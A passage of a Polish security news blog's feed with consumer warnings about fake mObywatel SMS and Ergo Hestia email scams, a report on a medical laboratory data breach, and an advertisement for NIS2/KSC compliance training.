<p>Kliknięcie w link z SMS przekierowuje ofiarę na stronę, na której może ona sprawdzić&nbsp;swoje punkty karne. Oczywiście sprawdzenie zawsze kończy się informacją&nbsp;o niepłaconym na 200 PLN mandacie. Próba jego opłacenia wyświetla formularz proszący o wprowadzenie danych karty płatniczej. Jeśli ktoś je wprowadzi i potwierdzi transakcję &#8220;płatności&#8221; w aplikacji swojego banku, to jego karta płatnicza zostanie dodana go walleta Google, dzięki czemu przestępcy będą nią mogli płacić bez konieczności proszenia o potwierdzenia transakcji i wyzerują konto ofiary.</p>
<h3>Jak można wykryć, że to atak i oszustwo?</h3>
<p>Jak widać, SMS &#8212; choć fałszywy &#8212; przychodzi z prawdziwej nazwy (tzw. nadpisu) <span class="code">mObywatel</span>. To powoduje, że fałszywa wiadomość wątkuje się z prawdziwymi wiadomościami, które wcześniej od rządowej usług mObywatel otrzymywała ofiara. To szalenie podnosi wiarygodność ataku. Ale&#8230;</p>
<p>Na ten atak nie złapią się osoby, które przestrzegają&nbsp;następujących, podstawowych zasad bezpieczeństwa:</p>
<ul>
<li>Analizuj linki w wiadomościach SMS przed kliknięciem. (link w SMS od oszustów nie jest poprawnym linkiem usługi rządowej, choć ma w nazwie &#8220;gov&#8221; i &#8220;pl&#8221;, to domena nie kończy się&nbsp;na <span class="code">gov.pl</span>)</li>
<li>Podczas płatnością&nbsp;karty w internecie, zawsze zwracaj uwagę na komunikat w aplikacji bankowej &#8212; czy to płatność a może dodanie do &#8220;portfela Google Pay&#8221;? Jaka jest kwota transakcji? Kto jest stroną&nbsp;transakcji?</li>
</ul>
<h3>Otrzymałem taką wiadomość, co robić, jak żyć?</h3>
<p>Jeśli nie uzupełniłeś formularzy danymi swojej karty, możesz spać spokojnie. Jeśli jednak podałeś dane karty, to natychmiast skontaktuj się ze swoim bankiem.</p>
<p>Ze względu na liczbę zgłoszeń oraz wiarygodnie wykonany spoofing prawdziwego nadpisu SMS należącego do mObywatela postanowiliśmy wysłać ostrzeżenie użytkownikom naszej <a href="https://niebezpiecznik.pl/app" target="_blank">aplikacji CyberAlerty</a>. Aplikacja CyberAlerty jest darmowa i dostępna zarówno na Andoida jak i na iPhone. Nie wymaga rejestracji a jedyne co robi, to wysyła Ci ostrzeżenia przed atakami, jeśli zauważymy nowy, istotny i masowy atak, który może spowodować kradzież Twoich danych lub pieniędzy albo zagraża Twojej prywatności. Aplikację pobierzesz z oficjalnego sklepu <a href="https://niebezpiecznik.pl/app" target="_blank">Google</a> lub <a href="https://niebezpiecznik.pl/app" target="_blank">Apple</a>.</p>
<p><em>Dziękujemy wszystkim Czytelnikom, którzy przesłali nam informacje o tych złośliwych wiadomościach </em><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f9e1.png" alt="🧡" class="wp-smiley" style="height: 1em; max-height: 1em;" /><em> To dzięki Wam możemy ostrzegać innych! </em></p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/mobywatel-mandat/#comments" rel="replies" thr:count="11" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/mobywatel-mandat/feed/atom/" rel="replies" thr:count="11" type="application/atom+xml"/>
			<thr:total>11</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[[AKTUALIZACJA] Laboratoria Medyczne Optimed zhackowane, dane pacjentów zostały wykradzione]]></title>
		<link href="https://niebezpiecznik.pl/post/laboratoria-medyczne-optimed-zhackowane-dane-pacjentow-mogly-zostac-wykradzione/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=27083</id>
		<updated>2026-05-10T06:31:05Z</updated>
		<published>2026-05-07T13:53:06Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="badania"/><category scheme="https://niebezpiecznik.pl" term="dane medyczne"/><category scheme="https://niebezpiecznik.pl" term="Diagnostyka"/><category scheme="https://niebezpiecznik.pl" term="Optimed"/><category scheme="https://niebezpiecznik.pl" term="pacjenci"/><category scheme="https://niebezpiecznik.pl" term="wyciek danych"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/laboratoria-medyczne-optimed-zhackowane-dane-pacjentow-mogly-zostac-wykradzione/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/05/Laboratoria-Medyczne-Optimed_2026-05-07_15-26-14-150x150.png" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>Laboratora Medyczne Optimed poinformowały o włamaniu na swoją infrastrukturę. Co ciekawe, spółka wie dokładnie kto stoi za atakiem (grupa z Białorusi) ale nie wie, czy dane pacjentów zostały wykradzione &#8212; w swoim oświadczeniu informuje o tym, że &#8220;nie można tego wykluczyć&#8221; i ostrzega że istnieje ryzyko prób kradzieży tożsamości oraz wyłudzeń finansowych i ujawniania informacji [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/laboratoria-medyczne-optimed-zhackowane-dane-pacjentow-mogly-zostac-wykradzione/"><![CDATA[<p>Laboratora Medyczne Optimed poinformowały o włamaniu na swoją infrastrukturę. Co ciekawe, spółka wie dokładnie kto stoi za atakiem (grupa z Białorusi) ale nie wie, czy dane pacjentów zostały wykradzione &#8212; w swoim oświadczeniu informuje o tym, że &#8220;nie można tego wykluczyć&#8221; i ostrzega że istnieje ryzyko prób kradzieży tożsamości oraz wyłudzeń finansowych i ujawniania informacji o stanie zdrowia pacjenta.</p>
<p>AKTUALIZACJA 10.05.2026: My jednak niestety mamy smutne informacje. Podająca się za Białorusinów grupa hakerska wykradła dane pacjentów i ich próbka jest już opublikowana w internecie. Do ataku doszło najprawdopodobniej przy wykorzystaniu głośnej ostatnio dziury w CPanelu (co mogłoby sugerować że infrastruktura Optimedu nie została załatana na czas).</p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/05/Laboratoria-Medyczne-Optimed_2026-05-07_15-26-14.png"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/05/Laboratoria-Medyczne-Optimed_2026-05-07_15-26-14-166x250.png" class="aligncenter size-medium wp-image-27084" width="166" height="250" alt="" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/05/Laboratoria-Medyczne-Optimed_2026-05-07_15-26-14-166x250.png 166w, https://niebezpiecznik.pl/wp-content/uploads/2026/05/Laboratoria-Medyczne-Optimed_2026-05-07_15-26-14-398x600.png 398w, https://niebezpiecznik.pl/wp-content/uploads/2026/05/Laboratoria-Medyczne-Optimed_2026-05-07_15-26-14-768x1157.png 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/05/Laboratoria-Medyczne-Optimed_2026-05-07_15-26-14-1019x1536.png 1019w, https://niebezpiecznik.pl/wp-content/uploads/2026/05/Laboratoria-Medyczne-Optimed_2026-05-07_15-26-14-1359x2048.png 1359w, https://niebezpiecznik.pl/wp-content/uploads/2026/05/Laboratoria-Medyczne-Optimed_2026-05-07_15-26-14.png 1654w" sizes="auto, (max-width: 166px) 100vw, 166px" /></a></p>
<blockquote><p>Informacje o naruszeniu danych osobowych<br />
Szanowni Państwo, działając jako administrator danych osobowych, Laboratoria Medyczne Optimed Sp. z o.o., na podstawie art. 34 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 (RODO), przekazujemy informację o naruszeniu ochrony danych osobowych, które może wiązać się z wysokim ryzykiem naruszenia praw i wolności osób, których dane są przez nas przetwarzane.<br />
W dniu <strong>3 maja 2026</strong> roku nasze laboratorium padło ofiarą ataku cyberprzestępców. Wykryliśmy incydent bezpieczeństwa polegający na nieuprawnionym dostępie do części naszej infrastruktury informatycznej. Wstępna analiza wykazała, że zorganizowania grupa cyberprzestępców <strong>z Białorusi</strong> przełamała dostęp do systemu – nie można wykluczyć, że osoby nieuprawnione mogły uzyskać dostęp do danych, które były tam przechowywane.</p>
<p>Zakres danych, które mogły zostać objęte incydentem obejmuje Państwa dane identyfikacyjne, w tym:<br />
<strong>&#8211; imię i nazwisko,<br />
&#8211; numer PESEL,<br />
&#8211; datę urodzenia<br />
&#8211; adres zamieszkania,<br />
&#8211; a także dane szczególnej kategorii dotyczące zdrowia, w szczególności informacje związane z wykonywanymi badaniami laboratoryjnymi oraz ich wynikami</strong>.</p>
<p>Z uwagi na charakter naruszenia istnieje ryzyko nieuprawnionego wykorzystania danych, w tym prób kradzieży tożsamości, zaciągania zobowiązań finansowych z wykorzystaniem Państwa danych, prób uzyskania dostępu do usług administracyjnych lub finansowych poprzez podszywanie się pod Państwa, a także naruszenia prywatności poprzez bezprawne ujawnienie informacji dotyczących stanu zdrowia.<br />
W celu ograniczenia potencjalnych skutków zdarzenia rekomendujemy niezwłoczne zastrzeżenie numeru PESEL za pośrednictwem serwisu obywatel.gov.pl lub aplikacji mObywatel, a także rozważenie aktywacji monitoringu kredytowego, np. w systemach oferowanych przez Biuro Informacji Kredytowej. Zalecamy również zachowanie szczególnej ostrożności wobec wiadomości e-mail, wiadomości SMS oraz połączeń telefonicznych, które mogą być próbą wyłudzenia dodatkowych danych.<br />
Wyrażamy głębokie ubolewanie z powodu zaistniałej sytuacji, jednocześnie informujemy jednak, że niezwłocznie po wykryciu incydentu podjęliśmy działania mające na celu ograniczenie jego skutków oraz zabezpieczenie naszej infrastruktury: zagrożone systemy zostały odizolowane, wdrożyliśmy także dodatkowe środki bezpieczeństwa oraz rozpoczęliśmy szczegółową analizę techniczną zdarzenia, usuwając jego źródło. O incydencie poinformowaliśmy Prezesa Urzędu Ochrony Danych Osobowych oraz właściwe organy ścigania.<br />
W przypadku pytań lub potrzeby uzyskania dodatkowych informacji prosimy o kontakt z Inspektorem Ochrony Danych pod adresem e-mail: iod@lab-optimed.pl.<br />
Z poważaniem, Zarząd Laboratoriów Medycznych Optimed Sp. z o.o.</p>
</blockquote>
<p>Optimed sugeruje, aby pacjenci zastrzegli sobie PESEL i wykupili monitoring kredytowy&#8230;</p>
<p>Przypomnijmy, że w końcówce 2023 roku <a href="https://niebezpiecznik.pl/tag/alab-laboratoria/" target="_blank">zhackowano Laboratorium diagnostyczne ALAB</a> &#8212; wykradzione dane pojawiły się&nbsp;później w Darknecie, gdzie pobrać mógł&nbsp;je każdy.</p>
<p>AKTUALIZACJA 10.05.2026: i niestety dokładnie tak samo się stało w przypadku Optimedu.</p>
<h3>Korzystałem z usług Optimedu &#8212; co robić, jak żyć?</h3>
<p>Zastrzeżenie PESEL-u o dobra rada, nawet jeśli nie jest się&nbsp;klientem Optimedu&#8230; Ale kwestia wycieków danych osobowych, a zwłaszcza danych medycznych, to problem bardziej skomplikowany i <strong>samo zastrzeżenie PESEL-u nie wystarczy</strong>. Co więcej, pacjenci niestety są narażeni na zdecydowanie więcej ryzyk niż same ryzyka finansowe i zastrzeżenie PESEL-u czy włączenie monitoringu ich przed tym nie zabezpieczy.</p>
<p>O tym co należy zrobić, jeśli podejrzewacie, że padliście ofiarą kradzieży danych w szczegółach i z praktycznymi radami mówimy na naszym krótkim i konkretnym szkoleniu online pt. &#8220;<a href="https://sklep.niebezpiecznik.pl/opis/6" target="_blank">Wycieki Danych &#8212; jak się&nbsp;przed nimi zabezpieczyć?</a>&#8220;. Ze względu na powyższy incydent, do końca dnia <strong>obniżamy cenę dostępu do nagrania tego szkolenia aż o 50%</strong> &#8212; wystarczy użyć kodu <span class="code">WYNIKI</span>, tutaj <a href="https://koszyk.niebezpiecznik.pl/cart/add_product/7672?code=WYNIKI" target="_blank">link bezpośrednio do koszyka</a>. Dostęp jest na 30 dni, więc spokojnie, na pewno uda Ci się zapoznać z tym materiałem.</p>
<p>W naszym materiale radzimy jak sprawdzić, czy nasze dane już wyciekły oraz co zrobić, jeśli do tego doszło. Dodatkowo oceniamy różne usługi, które rzekomo mają pomóc po takim ataku, ale czy naprawdę warto z nich korzystać i czy przypadkiem nie stanowi to większego ryzyka niż&nbsp;korzyści? Niestety, w Polsce wciąż nie mamy jednego miejsca, w którym ofiary kradzieży tożsamości mogłyby zabezpieczyć się przed negatywnymi skutkami wycieku ich danych. Ktoś, kto chce temat kompleksowo ogarnąć, musi wykonać&nbsp;<strong>aż kilkanaście czynności</strong> w różnych miejscach i serwisach. I o tym też mówimy <a href="https://koszyk.niebezpiecznik.pl/cart/add_product/7672?code=WYNIKI">w naszym szkoleniu online</a>.</p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/laboratoria-medyczne-optimed-zhackowane-dane-pacjentow-mogly-zostac-wykradzione/#comments" rel="replies" thr:count="13" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/laboratoria-medyczne-optimed-zhackowane-dane-pacjentow-mogly-zostac-wykradzione/feed/atom/" rel="replies" thr:count="13" type="application/atom+xml"/>
			<thr:total>13</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[&#x26a0;&#xfe0f; Uwaga na e-maile od &#8220;Ergo Hestia&#8221;]]></title>
		<link href="https://niebezpiecznik.pl/post/cyberalert-ergo-hestia-wyrownanie-platnosci/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=27075</id>
		<updated>2026-05-05T13:02:15Z</updated>
		<published>2026-05-05T12:58:24Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="cyberalert"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/cyberalert-ergo-hestia-wyrownanie-platnosci/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/05/cyberalert-hestia-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>Obserwujemy aktywną kampanię, w której oszuści podszywają się pod Ergo Hestia i masowo wysyłają e-maile do Polaków. Wiadomość dotyczy &#8220;wyrównania płatności&#8221; i obiecuje zwrot &#8220;279,79 PLN&#8221;. Jednakże, zamiast otrzymać pieniądze, ofiara może je stracić i to w wielokrotnie wyższej kwocie &#8212; jeśli kliknie w linka z e-maila. Oto jak wygląda wiadomość: Od: ERGO HESTIA (różne adresy [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/cyberalert-ergo-hestia-wyrownanie-platnosci/"><![CDATA[<p>Obserwujemy aktywną kampanię, w której oszuści podszywają się pod Ergo Hestia i masowo wysyłają e-maile do Polaków. Wiadomość dotyczy &#8220;wyrównania płatności&#8221; i obiecuje zwrot &#8220;279,79 PLN&#8221;. Jednakże, zamiast otrzymać pieniądze, ofiara może je stracić i to w wielokrotnie wyższej kwocie &#8212; jeśli kliknie w linka z e-maila.<span id="more-27075"></span></p>
<p>Oto jak wygląda wiadomość:</p>
<blockquote><p>Od: ERGO HESTIA (różne adresy e-mail)<br />
Tytuł: Wyrownanie platnosci<br />
Treść: </p>
<p>Elektroniczna Obsluga Klienta &#8211; Wyrownanie platnosci z tytulu aktualizacji zakresu ochrony<br />
05 maj 2026<br />
Szanowny Kliencie, uprzejmie zawiadamiamy, ze po aktualizacji wybranego zakresu ubezpieczenia i usunieciu opcji dodatkowej, powstala roznica w rozliczeniu. Pieniadze sa juz przygotowane do zwrotu.<br />
Suma wyrownania 279,79 PLN<br />
Wartosc z opcji dodatkowej	279,79 PLN<br />
Koszty manipulacyjne	0,00 PLN<br />
Zatwierdz wyrownanie salda<br />
Z powazaniem<br />
Zespol Obslugi Klienta Ergo Hestia<br />
ul. Mysia 2, 00-496 Warszawa<br />
05.05.2026</p></blockquote>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/05/cyberalert-hestia-scaled.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/05/cyberalert-hestia-600x337.jpg" alt="" width="600" height="337" class="aligncenter size-large wp-image-27076" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/05/cyberalert-hestia-600x337.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/05/cyberalert-hestia-350x197.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/05/cyberalert-hestia-768x432.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/05/cyberalert-hestia-1536x863.jpg 1536w, https://niebezpiecznik.pl/wp-content/uploads/2026/05/cyberalert-hestia-2048x1151.jpg 2048w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<p>Kliknięcie w link oraz uzupełnienie formularza danymi karty płatniczej powoduje zainicjowanie próby dodania jej przez przestępców do walleta Google Pay lub próby płatności np. za hosting internetowy. Jeśli ofiara potwierdzi te operacje, jej konto zostanie wyczyszczone. </p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/05/cyberalert-ergo-hestia.jpg"><img decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/05/cyberalert-ergo-hestia-449x600.jpg" alt="" width="349" height="" class="aligncenter size-large wp-image-27080" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/05/cyberalert-ergo-hestia-449x600.jpg 449w, https://niebezpiecznik.pl/wp-content/uploads/2026/05/cyberalert-ergo-hestia-187x250.jpg 187w, https://niebezpiecznik.pl/wp-content/uploads/2026/05/cyberalert-ergo-hestia-768x1027.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/05/cyberalert-ergo-hestia.jpg 1078w" sizes="(max-width: 449px) 100vw, 449px" /></a></p>
<h3>Jak można wykryć, że to oszustwo?</h3>
<p>Wystarczy przestrzegać następujących, dobrze znanych rad:</p>
<ul>
<li>Sprawdź dokładnie adres e-mail nadawcy (tu żaden nie jest w domenie ubezpieczyciela)
<li>Nie podawaj numeru karty płatniczej, jeśli chcesz OTRZYMAĆ ZWROT pieniędzy. (podanie numeru karty, z niewielkimi wyjątkami, które można pominąć, służy do jej obciążenia)
</ul>
<h3>Otrzymałem taką wiadomość, co robić, jak żyć?</h3>
<p>Jeśli nie uzupełniłeś formularzy swoimi danymi osobowymi i nie podałeś numeru karty, możesz spać spokojnie. Jeśli jednak podałeś dane karty, to natychmiast skontaktuj się ze swoim bankiem. </p>
<p>Ze względu na liczbę zgłoszeń i brak wykrywania stron jako złośliwe przez przeglądarki postanowiliśmy w tej kampanii wysłać ostrzeżenie użytkownikom naszej <a href="https://niebezpiecznik.pl/app" target="_blank">aplikacji CyberAlerty</a>. Aplikacja CyberAlerty jest darmowa i dostępna zarówno na Andoida jak i na iPhone. Nie wymaga rejestracji a jedyne co robi, to wysyła Ci ostrzeżenia przed atakami, jeśli zauważymy nowy, istotny i masowy atak, który może spowodować kradzież Twoich danych lub pieniędzy albo zagraża Twojej prywatności. Aplikację pobierzesz z oficjalnego sklepu <a href="https://niebezpiecznik.pl/app" target="_blank">Google</a> lub <a href="https://niebezpiecznik.pl/app" target="_blank">Apple</a>.</p>
<p><em>Dziękujemy wszystkim Czytelnikom, którzy przesłali nam informacje o tych złośliwych wiadomościach <img src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f9e1.png" alt="🧡" class="wp-smiley" style="height: 1em; max-height: 1em;" /> To dzięki Wam możemy ostrzegać innych! </em></p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/cyberalert-ergo-hestia-wyrownanie-platnosci/#comments" rel="replies" thr:count="6" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/cyberalert-ergo-hestia-wyrownanie-platnosci/feed/atom/" rel="replies" thr:count="6" type="application/atom+xml"/>
			<thr:total>6</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[Nowa ustawa o KSC (NIS2) w praktyce. Co musisz wiedzieć, kiedy i za co dostaniesz karę oraz co powinieneś zrobić już teraz?]]></title>
		<link href="https://niebezpiecznik.pl/post/nis2-ksc-szkolenie-zarzad-krajowy-system-cyberbezpieczenstwa-szkolenia/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=27067</id>
		<updated>2026-05-16T17:24:23Z</updated>
		<published>2026-05-05T08:02:30Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="Krajowy System Cyberbezpieczeństwa"/><category scheme="https://niebezpiecznik.pl" term="KSC"/><category scheme="https://niebezpiecznik.pl" term="KSC2"/><category scheme="https://niebezpiecznik.pl" term="Niebezpiecznik"/><category scheme="https://niebezpiecznik.pl" term="NIS2"/><category scheme="https://niebezpiecznik.pl" term="Polska"/><category scheme="https://niebezpiecznik.pl" term="prawo"/><category scheme="https://niebezpiecznik.pl" term="szkolenia"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/nis2-ksc-szkolenie-zarzad-krajowy-system-cyberbezpieczenstwa-szkolenia/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/05/nis2ksc-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>Od miesiąca w Polsce obowiązuje długo wyczekiwana nowelizacja ustawy o Krajowym Systemie Cyberbezpieczeństwa (tzw. KSC2), która implementuje unijną dyrektywę NIS2. Nowe prawo to nowe obowiązki dla tysięcy polskich firm, ale także surowe kary finansowe za niedopilnowanie konkretnych wymogów. Co istotne &#8212; odpowiedzialność za błędne wdrożenie KSC/NIS2 w organizacji spoczywa nie tylko na Członkach Zarządu ale [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/nis2-ksc-szkolenie-zarzad-krajowy-system-cyberbezpieczenstwa-szkolenia/"><![CDATA[<p>Od miesiąca w Polsce obowiązuje długo wyczekiwana nowelizacja ustawy o <strong>Krajowym Systemie Cyberbezpieczeństwa</strong> (tzw. KSC2), która implementuje unijną dyrektywę <strong>NIS2</strong>. Nowe prawo to nowe obowiązki dla tysięcy polskich firm, ale także <strong>surowe kary finansowe</strong> za niedopilnowanie konkretnych wymogów. Co istotne &#8212; odpowiedzialność za błędne wdrożenie KSC/NIS2 w organizacji spoczywa <strong>nie tylko na Członkach Zarządu ale na szerzej rozumianej kadrze kierowniczej</strong>. Co gorsza, jest to również odpowiedzialność <strong>osobista</strong>, a to oznacza, że i Ty możesz być narażony na sankcje i kary, które przyjdzie Ci zapłacić <strong>z własnej kieszeni</strong>. <span id="more-27067"></span></p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/05/nis2ksc-scaled.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/05/nis2ksc-600x345.jpg" alt="" width="500" height="345" class="aligncenter size-large wp-image-27070" /></a></p>
<p>Ale bez paniki! Jeśli jesteś <strong>dyrektorem</strong> (także np. działu <strong>HR</strong>), <strong>kierownikiem/managerem</strong> (nie tylko z IT), <strong>członkiem zarządu</strong>, <strong>CISO</strong>, <strong>bezpiecznikiem</strong>, <strong>prawnikiem</strong> albo po prostu osobą, na którą &#8220;zepchnięto&#8221; temat NIS2, to mamy dla Ciebie coś, co uratuje Ci skórę, budżet i nerwy. </p>
<h3>Szkolenie z NIS2/KSC: wszystko co trzeba wiedzieć (nie tylko dla Zarządów)!</h3>
<p>Już <strong>w środę 13 maja o 14:00</strong> organizujemy <strong>~2h szkolenie online</strong> pt.: &#8220;<a href="https://sklep.niebezpiecznik.pl/opis/37" target="_blank">NIS2 i KSC: wszystko co musisz wiedzieć</a>&#8221; — zapisz się na nie, nawet jeśli ten termin Ci nie pasuje, bo szkolenie jest nagrywane i będziesz mieć do niego dostęp przez rok, więc na pewno zdążysz się zapoznać z tym materiałem i będziesz mógł do niego komfortowo wracać na przestrzeni najbliższych miesięcy, kiedy wdrożenie NIS2 w Twojej firmie się rozpędzi. Dla tych, którzy znają jakość naszych szkoleń, <a href="https://koszyk.niebezpiecznik.pl/cart/add_product/21089" target="_blank">tutaj od razu link do koszyka</a> :) Nie warto zwlekać z zapisem, bo szkolenie w obniżonej <strong>aż o 60% cenie</strong> oferujemy <strong>tylko do środy</strong> &#8212; potem cena mocno wzrasta!</p>
<p><a href="https://sklep.niebezpiecznik.pl/opis/37"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/05/nis2-ksc2-szkolenie-600x156.png" alt="" width="600" height="156" class="aligncenter size-large wp-image-27068" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/05/nis2-ksc2-szkolenie-600x156.png 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/05/nis2-ksc2-szkolenie-350x91.png 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/05/nis2-ksc2-szkolenie-768x200.png 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/05/nis2-ksc2-szkolenie.png 1238w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<blockquote><p>Możemy także zrealizować to szkolenie <strong>w formie zamkniętej, tylko dla Twojej firmy</strong>, skupiając się wyłącznie na specyfice Twojej branży. Jeśli jesteś zainteresowany, <a href="mailto:projekty@niebezpiecznik.pl" target="_blank">napisz na tego e-maila</a> lub zadzwoń na numer 12-44-202-44 ustalimy szczegóły i terminy. </p></blockquote>
<h3>Dla kogo jest to szkolenie?</h3>
<p>Szkolenie dedykujemy przede wszystkim:</p>
<ul>
<li><strong>Członkom Zarządów i kadrze kierowniczej</strong> (bo oni ponoszą największą osobistą odpowiedzialność)</li>
<li><strong>LEGAL/RISK</strong>: Prawnikom, DPO, Audytorom, Compliance Officerom (bo są niezbędni w procesie wdrożenia NIS2/KSC)</li>
<li><strong>IT</strong>: Nie tylko CISO, ale także administratorom i bezpiecznikom (bo mają kluczowy wpływ na ryzyka techniczne i kwestie obsługi incydentów)</li>
<li><strong>PROCUREMENT</strong>: Osobom odpowiadającym za zakupy i kontakt z dostawcami (bo ich praca się mocno zmieni, a kwestia tzw. &#8220;łańcucha dostaw&#8221; nabrała istotnego znaczenia)</li>
<li><strong>HR</strong>: Osobom odpowiedzialnym za szkolenia pracowników (ze względu na wymogi dotyczące szkoleń cyber awareness personelu</li>
</ul>
<div class="info">Większość uczestników naszych szkoleń opłaca je z <strong>firmowego budżetu szkoleniowego</strong>, więc sprawdź w swoim dziale kadr możliwość sfinansowania udziału w tym szkoleniu. Jeśli będziesz potrzebować proformy, oferty w PDF albo po angielsku — daj nam znać pisząc na adres <a href="mailto:szkolenia@niebezpiecznik.pl" target="_blank">szkolenia@niebezpiecznik.pl</a>. Oferujemy też zniżki dla firm przy rejestracji <strong>więcej niż 5 osób</strong>, jeśli chcesz z niej skorzystać, napisz na szkolenia@niebezpiecznik.pl z tematem “NIS2 w praktyce”.</div>
<h3>Co w programie?</h3>
<p>Krótko mówiąc &#8212; <strong>wszystko co trzeba wiedzieć o NIS2/KSC2</strong> oraz praktyczne rady jak podejść do wdrożenia i uniknąć kosztownych błędów :-) Poniżej prezentujemy tylko skróconą agendę, z pełniejszym jej opisem możecie się zapoznać na <a href="https://sklep.niebezpiecznik.pl/opis/37">podstronie szkolenia</a>:  </p>
<ol>
<li><strong>Aktualny stan prawny NIS2 i KSC oraz punkty styczne/różnice z RODO, DORA i normami ISO </strong><br />
&#8211; Czy Twoja firma podlega pod nowe przepisy? Co dokładnie musisz wdrożyć już teraz? Odpowiedzialność, ryzyka i sankcje (zarówno dla firmy jak i osobiście, nie tylko dla Zarządu i kadry kierowniczej) <br />
&#8211; Jakich błędów nie popełniać i jakie zaniedbania będą najmocniej karane? <br />
&#8211; Czego dopilnować musi kadra kierownicza? Jakie pytania trzeba zadać sobie już teraz?</li>
<li><strong>Przykładowy plan wdrożenia krok po kroku i sugerowany skład zespołu</strong><br />
&#8211; Od czego zacząć wdrażanie NIS2 / KSC, by nie sparaliżować firmy?<br />
&#8211; Kogo i na jakim etapie warto zaangażować, aby wdrożenie zakończyło się skucesem?</li>
<li><strong>Wymogi w stosunku do wszystkich pracowników</strong><br />
&#8211; Obowiązek szkoleń. Jak upiec dwie pieczenie na jednym ogniu?<br />
&#8211; Jak edukować pracowników skutecznie? Praktyczne rady bazujące na 20 latach doświadczeń Niebezpiecznika</li>
<li><strong>Audyty, ataki i incydenty</strong><br />
&#8211; Czym w świetle przepisów jest incydent? Komu i jak go poprawnie zgłosić?<br />
&#8211; Krytyczne pierwsze 24 i 72 godziny po ataku z perspektywy działań Zarządu<br />
&#8211; Perspektywa pentestera: na jakie ataki trzeba przygotować organizację a czym (mimo medialnego szumu) nie warto się przejmować?<br />
&#8211; Przegląd kilku istotnych incydentów i twarde rady jak się przed nimi obronić.</li>
<li><strong>Podsumowanie oraz sesja Q&#038;A (pytań i odpowiedzi)</strong></li>
<p> </ol>
<blockquote><p>Doradztwo w zakresie tego typu wdrożeń w wykonaniu ekspertów tej klasy kosztuje górne kilkadziesiąt tysięcy złotych. My oferujemy tę wiedzę za kwotę &#8230;godzinnych konsultacji. Ale <strong>tylko do środy</strong>! Potem cena mocno wzrasta. Dlatego nie zwlekaj i wykup roczny dostęp do wiedzy, do której na pewno będziesz wracać w ciągu najbliższych miesięcy wielokrotnie.</p>
<p><a href="https://sklep.niebezpiecznik.pl/opis/37"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/05/nis2-ksc2-szkolenie-600x156.png" alt="" width="500" height="156" class="aligncenter size-large wp-image-27068" /></a>
</p></blockquote>
<h3>Kto prowadzi to szkolenie</h3>
